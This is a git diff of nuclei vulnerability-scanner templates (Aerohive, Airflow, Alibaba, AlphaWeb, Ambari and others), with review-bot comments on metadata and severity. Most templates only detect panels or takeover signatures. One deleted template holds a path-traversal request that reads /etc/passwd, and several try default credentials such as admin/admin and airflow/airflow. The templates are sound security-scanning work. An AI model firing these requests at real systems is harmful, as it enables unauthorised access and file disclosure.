shodan-dork: 'http.title:"Aerohive NetConfig UI"' + tags: panel,tech,hiveos,aerohive + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php5" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Aerohive NetConfig UI' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' diff --git a/nuclei-templates/Other/aftership-takeover-204.yaml b/nuclei-templates/Other/aftership-takeover-204.yaml new file mode 100644 index 0000000000..2249dbf383 --- /dev/null +++ b/nuclei-templates/Other/aftership-takeover-204.yaml 
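Review bot: The rewritten aerohive-netconfig-ui-200.yaml drops `description`, `reference` and the `classification` block and keeps only name, author and severity; at minimum keep `reference:` with `- https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm` so a reader can see what the `index.php5` marker and the version regex are based on. The request, matchers and extractor appear byte-identical to the old side, so this is a documentation regression rather than a logic change.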
@@ -0,0 +1,18 @@ +id: aftership-takeover + +info: + name: Aftership Takeover Detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - Oops.

The page you're looking for doesn't exist. \ No newline at end of file diff --git a/nuclei-templates/Other/aftership-takeover-206.yaml b/nuclei-templates/Other/aftership-takeover-206.yaml deleted file mode 100644 index 9407e028c7..0000000000 --- a/nuclei-templates/Other/aftership-takeover-206.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: aftership-takeover -info: - name: Aftership Takeover Detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Oops.

The page you're looking for doesn't exist. diff --git a/nuclei-templates/Other/agilecrm-takeover-208.yaml b/nuclei-templates/Other/agilecrm-takeover-210.yaml similarity index 100% rename from nuclei-templates/Other/agilecrm-takeover-208.yaml rename to nuclei-templates/Other/agilecrm-takeover-210.yaml diff --git a/nuclei-templates/Other/aha-takeover-213.yaml b/nuclei-templates/Other/aha-takeover-213.yaml new file mode 100644 index 0000000000..649b36b6e5 --- /dev/null +++ b/nuclei-templates/Other/aha-takeover-213.yaml @@ -0,0 +1,15 @@ +id: aha-takeover +info: + name: Aha Takeover Detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - There is no portal here ... sending you back to Aha! diff --git a/nuclei-templates/Other/aha-takeover.yaml b/nuclei-templates/Other/aha-takeover.yaml deleted file mode 100644 index 854e9de4a5..0000000000 --- a/nuclei-templates/Other/aha-takeover.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: aha-takeover -info: - name: Aha - Subdomain Takeover Detection - author: pdteam - severity: high - description: An Aha subdomain takeover was detected. - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - There is no portal here ... sending you back to Aha! - -# Enhanced by mp on 2022/07/19 diff --git a/nuclei-templates/Other/aims-password-mgmt-client-221.yaml b/nuclei-templates/Other/aims-password-mgmt-client-221.yaml new file mode 100644 index 0000000000..c6f768a5c9 --- /dev/null +++ b/nuclei-templates/Other/aims-password-mgmt-client-221.yaml 
@@ -0,0 +1,27 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + description: An Aims Password management client was detected. + severity: info + tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/nuclei-templates/Other/aims-password-mgmt-client.yaml b/nuclei-templates/Other/aims-password-mgmt-client.yaml deleted file mode 100644 index a178296f3f..0000000000 --- a/nuclei-templates/Other/aims-password-mgmt-client.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel,aims - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/nuclei-templates/Other/aims-password-portal-222.yaml b/nuclei-templates/Other/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/nuclei-templates/Other/aims-password-portal-222.yaml +++ b/nuclei-templates/Other/aims-password-portal-222.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/nuclei-templates/Other/airee-takeover-228.yaml b/nuclei-templates/Other/airee-takeover-228.yaml deleted file mode 100644 index e63a59bcc0..0000000000 --- a/nuclei-templates/Other/airee-takeover-228.yaml +++ /dev/null 
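Review bot: The new aims-password-mgmt-client-221.yaml carries an empty `cve-id:` key under `classification`, which YAML parses as null and which adds nothing for an info-severity detection template. The same empty key appears on the new side of alfresco-detect.yaml, amcrest-login.yaml, ametys-admin-login.yaml, ampps-admin-panel-305.yaml and ampps-panel-310.yaml in this diff. Dropping the line, or only listing `cve-id` when there is a value to put there, keeps the classification block meaningful; the `cvss-metrics` / `cvss-score: 0.0` pair is fine as an explicit no-impact statement.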
@@ -1,19 +0,0 @@ -id: airee-takeover - -info: - name: Airee Takeover Detection - author: pdteam - severity: high - - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: airee - words: - - 'Ошибка 402. Сервис Айри.рф не оплачен' \ No newline at end of file diff --git a/nuclei-templates/Other/airee-takeover.yaml b/nuclei-templates/Other/airee-takeover.yaml new file mode 100644 index 0000000000..b0ab7e7b52 --- /dev/null +++ b/nuclei-templates/Other/airee-takeover.yaml @@ -0,0 +1,17 @@ +id: airee-takeover +info: + name: Airee Takeover Detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + name: airee + words: + - 'Ошибка 402. Сервис Айри.рф не оплачен' diff --git a/nuclei-templates/Other/airflow-debug.yaml b/nuclei-templates/Other/airflow-debug.yaml index 7e88c457d2..dc6f4a4a58 100644 --- a/nuclei-templates/Other/airflow-debug.yaml +++ b/nuclei-templates/Other/airflow-debug.yaml @@ -4,9 +4,6 @@ info: name: Airflow Debug Trace author: pdteam severity: low - metadata: - verified: true - shodan-query: title:"Airflow - DAGs" tags: apache,airflow,fpd requests: diff --git a/nuclei-templates/Other/airflow-default-login-235.yaml b/nuclei-templates/Other/airflow-default-login-235.yaml deleted file mode 100644 index cef2568e5d..0000000000 --- a/nuclei-templates/Other/airflow-default-login-235.yaml +++ /dev/null 
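Review bot: airflow-debug.yaml loses its `metadata` block (`verified: true` and `shodan-query: title:"Airflow - DAGs"`) while airflow-detect.yaml, added further down in this same diff, gains exactly that kind of block. Unless the query was wrong, removing the verification marker and the discovery query makes the template harder to validate and to triage. If the intent was to relocate rather than delete, restore `metadata:` with `verified: true` and the `shodan-query` line under `info`.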
@@ -1,49 +0,0 @@ -id: airflow-default-login -info: - name: Apache Airflow Default Login - author: pdteam - severity: critical - tags: airflow,default-login,apache - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - metadata: - shodan-query: title:"Sign In - Airflow" -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - type: word - words: - - 'You should be redirected automatically to target URL: ' diff --git a/nuclei-templates/Other/airflow-default-login-236.yaml b/nuclei-templates/Other/airflow-default-login-236.yaml new file mode 100644 index 0000000000..772e1ffd78 --- /dev/null +++ b/nuclei-templates/Other/airflow-default-login-236.yaml 
@@ -0,0 +1,64 @@ +id: airflow-default-login + +info: + name: Apache Airflow Default Login + author: pdteam + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache + +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + + attack: pitchfork + payloads: + username: + - airflow + password: + - airflow + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Sign In - Airflow")' + - 'contains(all_headers_2, "session=.")' + - 'status_code_2 == 302' + condition: and + + - type: word + words: + - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-detect-238.yaml b/nuclei-templates/Other/airflow-detect-238.yaml deleted file mode 100644 index 5306691e5b..0000000000 --- a/nuclei-templates/Other/airflow-detect-238.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: airflow-detect - -info: - name: Apache Airflow - author: pdteam - severity: info - tags: tech,apache,airflow - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Airflow 404 = lots of circles" - - - type: status - status: - - 404 
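Review bot: The `csrf_token` extractor regex `'type="hidden" value="(.*?)">'` matches the first hidden input on the login page rather than the CSRF field specifically, so the second request may carry an unrelated hidden value and the `status_code_2 == 302` check can then fail or succeed for the wrong reason. If the Airflow login form names the field (the body posts it as `_csrf_token`), anchoring the pattern on that name would make the extraction deterministic; I cannot confirm the rendered markup from here. The change from `critical` to `severity: high` is consistent with the added `cvss-score: 8.3`, so that part reads as intended.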
diff --git a/nuclei-templates/Other/airflow-detect.yaml b/nuclei-templates/Other/airflow-detect.yaml new file mode 100644 index 0000000000..2d90657154 --- /dev/null +++ b/nuclei-templates/Other/airflow-detect.yaml @@ -0,0 +1,27 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/airflow-panel-241.yaml b/nuclei-templates/Other/airflow-panel.yaml similarity index 100% rename from nuclei-templates/Other/airflow-panel-241.yaml rename to nuclei-templates/Other/airflow-panel.yaml diff --git a/nuclei-templates/Other/akamai-arl-xss-249.yaml b/nuclei-templates/Other/akamai-arl-xss-246.yaml similarity index 100% rename from nuclei-templates/Other/akamai-arl-xss-249.yaml rename to nuclei-templates/Other/akamai-arl-xss-246.yaml diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml new file mode 100644 index 0000000000..271a1c4865 --- /dev/null +++ b/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml 
@@ -0,0 +1,32 @@ +id: alfacgiapi-wordpress + +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress.yaml b/nuclei-templates/Other/alfacgiapi-wordpress.yaml deleted file mode 100644 index 27d4456e69..0000000000 --- a/nuclei-templates/Other/alfacgiapi-wordpress.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alfresco-detect-258.yaml b/nuclei-templates/Other/alfresco-detect-258.yaml deleted file mode 100644 index bb8f41ee52..0000000000 
--- a/nuclei-templates/Other/alfresco-detect-258.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfresco-detect - -info: - name: Alfresco CMS Detection - author: pathtaga - severity: info - tags: alfresco,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' - - - type: word - part: header - words: - - "application/json" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/alfresco-detect.yaml b/nuclei-templates/Other/alfresco-detect.yaml new file mode 100644 index 0000000000..0a9414afb1 --- /dev/null +++ b/nuclei-templates/Other/alfresco-detect.yaml @@ -0,0 +1,43 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + description: Alfresco CMS was discovered. + severity: info + tags: alfresco,tech,panel + reference: + - https://www.alfresco.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' + +# Enhanced by mp on 2022/03/16 
diff --git a/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml b/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml deleted file mode 100644 index c22898310b..0000000000 --- a/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: Alibaba-Anyproxy-fileRead - -info: - name: Alibaba Anyproxy fetchBody file arbitrary file read - author: str1am - severity: high - reference: - - https://github.com/alibaba/anyproxy/issues/391 - tags: H5AnyproxyS,fileRead - -requests: - - method: GET - path: - - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "root:x" - - "CONNECT" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml b/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml new file mode 100644 index 0000000000..4eac8813a4 --- /dev/null +++ b/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml @@ -0,0 +1,35 @@ +id: alibaba-canal-info-leak + +info: + name: Alibaba Canal Info Leak + author: pikpikcu + severity: info + + reference: + - https://github.com/alibaba/canal/issues/632 + - https://netty.io/wiki/reference-counted-objects.html + - https://my.oschina.net/u/4581879/blog/4753320 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/canal/config/1/1" + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + condition: and + part: header + - type: word + words: + - "ncanal.aliyun.accessKey" + - "ncanal.aliyun.secretKey" + condition: and + part: body diff --git a/nuclei-templates/Other/alibaba-canal-info-leak.yaml b/nuclei-templates/Other/alibaba-canal-info-leak.yaml deleted file mode 100644 index 0d04d1e1b6..0000000000 --- a/nuclei-templates/Other/alibaba-canal-info-leak.yaml +++ /dev/null 
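Review bot: The new alibaba-canal-info-leak-264.yaml has no `tags` line, whereas the copy deleted on the next line carried `tags: config,exposure,alibaba`; a template without tags is invisible to tag-based selection, and the stray blank line after `severity: info` suggests the field was dropped by accident. alibaba-mongoshake-unauth-270.yaml in this diff shrinks its tags from `mongoshake,unauth,alibaba` to `mongoshake,unauth`, losing the vendor tag the same way. Re-add `tags: config,exposure,alibaba` under `info` here and keep `alibaba` on the mongoshake template.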
@@ -1,35 +0,0 @@ -id: alibaba-canal-info-leak - -info: - name: Alibaba Canal Info Leak - author: pikpikcu - severity: info - reference: - - https://github.com/alibaba/canal/issues/632 - - https://netty.io/wiki/reference-counted-objects.html - - https://my.oschina.net/u/4581879/blog/4753320 - tags: config,exposure,alibaba - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/canal/config/1/1" - headers: - Content-Type: application/json - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - condition: and - part: header - - type: word - words: - - "ncanal.aliyun.accessKey" - - "ncanal.aliyun.secretKey" - condition: and - part: body diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml deleted file mode 100644 index 23048a649f..0000000000 --- a/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: alibaba-mongoshake-unauth - -info: - name: Alibaba Mongoshake Unauth - author: pikpikcu - severity: info - tags: mongoshake,unauth,alibaba - -requests: - - method: GET - path: - - '{{BaseURL}}/' - - matchers-condition: and - matchers: - - - type: word - words: - - '{"Uri":"/worker","Method":"GET"}' - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml 
@@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alphaweb-default-login-275.yaml b/nuclei-templates/Other/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..6a48f18c6e --- /dev/null +++ b/nuclei-templates/Other/alphaweb-default-login-275.yaml @@ -0,0 +1,43 @@ +id: alphaweb-default-login + +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb + +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/alphaweb-default-login-277.yaml b/nuclei-templates/Other/alphaweb-default-login-277.yaml deleted file mode 100644 index ead9658955..0000000000 --- a/nuclei-templates/Other/alphaweb-default-login-277.yaml +++ /dev/null 
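Review bot: alphaweb-default-login-275.yaml uses a mixed-case tag, `tags: default-login,AlphaWeb`, while every other template in this diff keeps tags lowercase. Whether or not tag filtering in the scanner is case-insensitive, a mixed-case tag will not line up with other vendor tags in listings and greps. Change it to `tags: default-login,alphaweb`.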
@@ -1,30 +0,0 @@ -id: alphaweb-default-login -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/amazon-mws-auth-token-282.yaml b/nuclei-templates/Other/amazon-mws-auth-token-282.yaml deleted file mode 100644 index 28e8063f5e..0000000000 --- a/nuclei-templates/Other/amazon-mws-auth-token-282.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: amazon-mws-auth-token -info: - name: Amazon MWS Auth Token - author: puzzlepeaches - severity: info - tags: exposure,token,aws -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/amazon-mws-auth-token.yaml b/nuclei-templates/Other/amazon-mws-auth-token.yaml new file mode 100644 index 0000000000..eb41de1dae --- /dev/null +++ b/nuclei-templates/Other/amazon-mws-auth-token.yaml @@ -0,0 +1,18 @@ +id: amazon-mws-auth-token + +info: + name: Amazon MWS Auth Token + author: puzzlepeaches + severity: info + tags: exposure,token,aws,amazon,auth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/ambari-default-credentials-285.yaml b/nuclei-templates/Other/ambari-default-credentials-285.yaml deleted file mode 100644 index cd31405298..0000000000 
--- a/nuclei-templates/Other/ambari-default-credentials-285.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: ambari-default-credentials - -info: - name: Apache Ambari Default Credentials - author: pdteam - severity: medium - tags: ambari,default-login - -requests: - - method: GET - path: - - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ambari-default-credentials.yaml b/nuclei-templates/Other/ambari-default-credentials.yaml new file mode 100644 index 0000000000..60933a6e9f --- /dev/null +++ b/nuclei-templates/Other/ambari-default-credentials.yaml @@ -0,0 +1,18 @@ +id: ambari-default-credentials +info: + name: Apache Ambari Default Credentials + author: pdteam + severity: medium + tags: ambari,default-login +requests: + - method: GET + path: + - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login-287.yaml b/nuclei-templates/Other/ambari-default-login-287.yaml new file mode 100644 index 0000000000..2fd02dc340 --- /dev/null +++ b/nuclei-templates/Other/ambari-default-login-287.yaml 
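Review bot: The new ambari-default-credentials.yaml sends a fixed `Authorization: "Basic YWRtaW46YWRtaW4="` header with nothing saying what the literal encodes, while ambari-default-login-287.yaml on the next line checks the same `admin`/`admin` pair against the same endpoint and matcher through `payloads` and `{{base64(username + ':' + password)}}`. The two templates are therefore redundant, and their severities already diverge from the `high` rating the deleted ambari-default-login.yaml carried. At minimum document the literal, e.g. `Authorization: "Basic YWRtaW46YWRtaW4="  # base64(admin:admin), same pair as ambari-default-login`, or drop this copy in favour of the payload-driven template.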
@@ -0,0 +1,24 @@ +id: ambari-default-login +info: + name: Apache Ambari Default Login + author: pdteam + severity: medium + tags: ambari,default-login,apache +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login.yaml b/nuclei-templates/Other/ambari-default-login.yaml deleted file mode 100644 index 75b4ec03c1..0000000000 --- a/nuclei-templates/Other/ambari-default-login.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: ambari-default-login -info: - name: Apache Ambari Default Login - author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: ambari,default-login,apache -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/ambari-exposure-293.yaml b/nuclei-templates/Other/ambari-exposure-293.yaml deleted file mode 100644 index a420d84dba..0000000000 --- a/nuclei-templates/Other/ambari-exposure-293.yaml +++ /dev/null 
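Review bot: ambari-default-login-287.yaml lowers `severity` from `high` to `medium` and drops the `description`, `reference` and `classification` block (`cvss-score: 8.3`, `cwe-id: CWE-522`) that the deleted ambari-default-login.yaml on the same line carried, with no reason recorded in the change. A working default admin login on Ambari is the same finding either way, so the rating should follow the CVSS entry rather than silently drop a level. I would carry the `description`, `reference` and `classification` block into the new file and keep `severity: high` unless the score is revised as well.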
@@ -1,26 +0,0 @@ -id: ambari-exposure - -info: - name: Apache Ambari Exposure Admin Login Panel - author: pdteam - severity: medium - description: An Apache Ambari panel was discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: panel,apache,ambari,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - 'Ambari' - - 'href="http://www.apache.org/licenses/LICENSE-2.0"' - condition: and - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ambari-exposure.yaml b/nuclei-templates/Other/ambari-exposure.yaml new file mode 100644 index 0000000000..e1db0b3c1f --- /dev/null +++ b/nuclei-templates/Other/ambari-exposure.yaml @@ -0,0 +1,23 @@ +id: ambari-exposure +info: + name: Apache Ambari Exposure Admin Login Panel + author: pdteam + severity: medium + description: An Apache Ambari panel was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: panel,apache,ambari,exposure +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - 'Ambari' + - 'href="http://www.apache.org/licenses/LICENSE-2.0"' + condition: and + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/amcrest-login.yaml b/nuclei-templates/Other/amcrest-login.yaml index 1c2714211b..7455bbce1f 100644 --- a/nuclei-templates/Other/amcrest-login.yaml +++ b/nuclei-templates/Other/amcrest-login.yaml 
